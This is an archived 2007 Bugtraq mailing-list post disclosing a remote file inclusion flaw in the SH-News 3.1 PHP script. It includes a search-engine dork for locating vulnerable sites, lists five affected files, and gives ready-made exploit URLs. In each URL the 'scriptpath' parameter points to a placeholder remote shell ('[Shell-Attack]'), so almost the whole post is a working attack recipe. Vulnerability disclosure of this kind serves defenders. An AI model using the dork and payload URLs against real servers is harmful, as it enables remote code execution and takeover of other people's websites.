lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070614204820.6983.qmail@securityfocus.com> Date: 14 Jun 2007 20:48:20 -0000 From: Raed@...Mail.Com To: bugtraq@...urityfocus.com Subject: RFI In Script SH-News 3.1 Found By : Hasadya Raed Contact : RaeD@...Mail.Com --------------------------- Script : SH-News 3.1 Dork : "Powered by SH-News 3.1" Greetz : Guardian Information Systems --------------------------- B.Files : report.php archive.php comments.php init.php news.php Exploits : http://www.Victim.Com/path/report.php?scriptpath=[Shell-Attack] http://www.Victim.Com/path/archive.php?scriptpath=[Shell-Attack] http://www.Victim.Com/path/comments.php?scriptpath=[Shell-Attack] http://www.Victim.Com/path/init.php?scriptpath=[Shell-Attack] http://www.Victim.Com/path/news.php?scriptpath=[Shell-Attack]